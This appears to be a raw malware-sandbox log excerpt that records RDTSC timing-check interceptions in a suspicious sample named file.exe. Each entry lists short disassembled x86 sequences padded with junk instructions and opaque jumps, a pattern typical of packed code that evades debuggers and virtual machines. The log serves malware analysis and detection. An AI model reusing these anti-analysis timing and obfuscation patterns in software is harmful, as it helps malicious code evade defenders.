                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268066 second address: 1268084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F849C4F2DA1h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268084 second address: 1268088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268088 second address: 1268094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1268094 second address: 126809C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126809C second address: 12680A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12680A1 second address: 12680B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 jns 00007F849CDA41FCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B412 second address: 126B418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B418 second address: 126B41C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B41C second address: 10F1B76 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F849C4F2D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 7F30098Ah 0x00000013 mov edx, dword ptr [ebp+122D2C60h] 0x00000019 push dword ptr [ebp+122D105Dh] 0x0000001f mov edx, dword ptr [ebp+122D1AFDh] 0x00000025 call dword ptr [ebp+122D2301h] 0x0000002b pushad 0x0000002c stc 0x0000002d cld 0x0000002e xor eax, eax 0x00000030 jmp 00007F849C4F2DA2h 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 sub dword ptr [ebp+122D1BB9h], edx 0x0000003f cld 0x00000040 mov dword ptr [ebp+122D2D3Ch], eax 0x00000046 pushad 0x00000047 jns 00007F849C4F2D96h 0x0000004d movsx eax, si 0x00000050 popad 0x00000051 mov esi, 0000003Ch 0x00000056 jmp 00007F849C4F2D9Ah 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f add dword ptr [ebp+122D1BFFh], edx 0x00000065 lodsw 0x00000067 mov dword ptr [ebp+122D1BF9h], edi 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jmp 00007F849C4F2D9Fh 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a pushad 0x0000007b mov dword ptr [ebp+122D1988h], ecx 0x00000081 movzx ebx, dx 0x00000084 popad 0x00000085 sub dword ptr [ebp+122D1BB9h], ebx 0x0000008b nop 0x0000008c push eax 0x0000008d push edx 0x0000008e pushad 0x0000008f push edx 0x00000090 pop edx 0x00000091 push eax 0x00000092 pop eax 0x00000093 popad 0x00000094 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B49B second address: 126B4C2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F849CDA41FFh 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 popad 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B4C2 second address: 126B4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B4C6 second address: 126B52B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F849CD25978h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 jng 00007F849CD25982h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c pushad 0x0000001d jnl 00007F849CD25976h 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 popad 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 pop edx 0x0000002a popad 0x0000002b pop eax 0x0000002c mov edi, dword ptr [ebp+122D2C60h] 0x00000032 push 00000003h 0x00000034 mov dword ptr [ebp+122D28E2h], edx 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122D1BF1h], edx 0x00000042 push 00000003h 0x00000044 mov dword ptr [ebp+122D1C6Eh], esi 0x0000004a push DFC3D4F4h 0x0000004f jo 00007F849CD25984h 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B52B second address: 126B52F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B58B second address: 126B5D7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F849CD25978h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov di, 3C6Eh 0x00000028 adc di, FBABh 0x0000002d push 00000000h 0x0000002f or dword ptr [ebp+122D1AE3h], ebx 0x00000035 call 00007F849CD25979h 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push edi 0x0000003e pop edi 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B5D7 second address: 126B6E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD73E65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F849CD73E58h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F849CD73E64h 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a pushad 0x0000001b jmp 00007F849CD73E5Bh 0x00000020 jno 00007F849CD73E5Ch 0x00000026 popad 0x00000027 mov eax, dword ptr [eax] 0x00000029 pushad 0x0000002a push esi 0x0000002b pushad 0x0000002c popad 0x0000002d pop esi 0x0000002e jno 00007F849CD73E66h 0x00000034 popad 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 pushad 0x0000003a push esi 0x0000003b pushad 0x0000003c popad 0x0000003d pop esi 0x0000003e ja 00007F849CD73E5Ch 0x00000044 popad 0x00000045 pop eax 0x00000046 movzx edx, dx 0x00000049 push 00000003h 0x0000004b call 00007F849CD73E65h 0x00000050 je 00007F849CD73E5Ch 0x00000056 mov dword ptr [ebp+122D2A34h], edi 0x0000005c pop edx 0x0000005d and edi, dword ptr [ebp+122D2D60h] 0x00000063 push 00000000h 0x00000065 call 00007F849CD73E64h 0x0000006a mov dword ptr [ebp+122D17F2h], edi 0x00000070 pop esi 0x00000071 push 00000003h 0x00000073 and ecx, 65F7D520h 0x00000079 call 00007F849CD73E59h 0x0000007e jnc 00007F849CD73E6Bh 0x00000084 push eax 0x00000085 push eax 0x00000086 push edx 0x00000087 jmp 00007F849CD73E5Eh 0x0000008c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B6E7 second address: 126B6ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1289FBB second address: 1289FD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F849CD73E5Ch 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F849CD73E56h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1289FD7 second address: 1289FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CD25983h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A3D9 second address: 128A3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A3E2 second address: 128A3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A7BD second address: 128A7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A7C3 second address: 128A7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F849CD25976h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A7D4 second address: 128A7E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F849CD73E5Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A7E4 second address: 128A7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A7E8 second address: 128A7EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A7EC second address: 128A801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F849CD2597Bh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A801 second address: 128A83F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD73E63h 0x00000007 jmp 00007F849CD73E66h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F849CD73E56h 0x00000019 js 00007F849CD73E56h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A83F second address: 128A848 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F099 second address: 127F09D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F09D second address: 127F0D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD25980h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F849CD25976h 0x00000013 jmp 00007F849CD25985h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F0D0 second address: 127F0E5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F849CD73E56h 0x00000008 jne 00007F849CD73E56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F0E5 second address: 127F0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F849CD25980h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255E9A second address: 1255EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255EA0 second address: 1255EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255EA6 second address: 1255EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F849CD73E66h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255EC5 second address: 1255EDB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jo 00007F849CD25976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F849CD25976h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255EDB second address: 1255EF0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jbe 00007F849CD73E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jbe 00007F849CD73E56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255EF0 second address: 1255EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F849CD25976h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B54E second address: 128B554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B554 second address: 128B560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F849CD25978h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B7F1 second address: 128B833 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F849CD73E6Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F849CD73E60h 0x00000012 jmp 00007F849CD73E5Fh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B833 second address: 128B85B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F849CD25980h 0x00000008 jmp 00007F849CD25983h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BC77 second address: 128BC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F849CD73E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BC81 second address: 128BC89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BC89 second address: 128BCA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD73E62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290D59 second address: 1290D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 jo 00007F849CD25994h 0x0000000c jc 00007F849CD2597Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290D6D second address: 1290D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290D78 second address: 1290D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1292355 second address: 1292359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E365 second address: 125E36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E36F second address: 125E373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E373 second address: 125E37C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1297DEF second address: 1297DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129823E second address: 1298272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD25981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F849CD25978h 0x00000010 push esi 0x00000011 pop esi 0x00000012 push edi 0x00000013 jmp 00007F849CD2597Eh 0x00000018 push eax 0x00000019 pop eax 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129851A second address: 129851E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129851E second address: 129853C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F849CD25984h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12986A0 second address: 12986A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12986A4 second address: 12986B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD2597Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12987DF second address: 12987E5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12987E5 second address: 12987FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007F849CD2597Bh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A82E second address: 129A849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F849CD73E60h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129AD83 second address: 129AD89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129AD89 second address: 129AD8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B5CA second address: 129B5E7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F849CD25976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F849CD25981h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B6B8 second address: 129B6D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CD73E69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B77F second address: 129B784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B8D9 second address: 129B8E3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F849CD73E5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B8E3 second address: 129B8EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129BC56 second address: 129BC6D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F849CD73E58h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F849CD73E56h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129BC6D second address: 129BC73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129BC73 second address: 129BCA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov esi, dword ptr [ebp+1244C794h] 0x00000011 xchg eax, ebx 0x00000012 push edx 0x00000013 jmp 00007F849CD73E60h 0x00000018 pop edx 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jnl 00007F849CD73E56h 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129BCA4 second address: 129BCB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F849CD2597Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129D0D1 second address: 129D0E3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007F849CD73E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129D0E3 second address: 129D0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129D70B second address: 129D75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F849CD73E65h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e sub dword ptr [ebp+122D2EAAh], edx 0x00000014 push edi 0x00000015 call 00007F849CD73E5Ah 0x0000001a mov dword ptr [ebp+122D1AE3h], ebx 0x00000020 pop edi 0x00000021 pop edi 0x00000022 push 00000000h 0x00000024 and esi, dword ptr [ebp+122D2E8Ch] 0x0000002a push 00000000h 0x0000002c xor dword ptr [ebp+1244C7C7h], edi 0x00000032 xchg eax, ebx 0x00000033 push ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 js 00007F849CD73E56h 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129D75C second address: 129D760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129D760 second address: 129D771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 jo 00007F849CD73E5Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129E1F5 second address: 129E23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 add dword ptr [ebp+1244C7C2h], edx 0x0000000f push 00000000h 0x00000011 add esi, 7A52F5A3h 0x00000017 push 00000000h 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b jmp 00007F849CD25983h 0x00000020 jg 00007F849CD25978h 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a je 00007F849CD25980h 0x00000030 jmp 00007F849CD2597Ah 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129FA60 second address: 129FA64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A0792 second address: 12A0796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
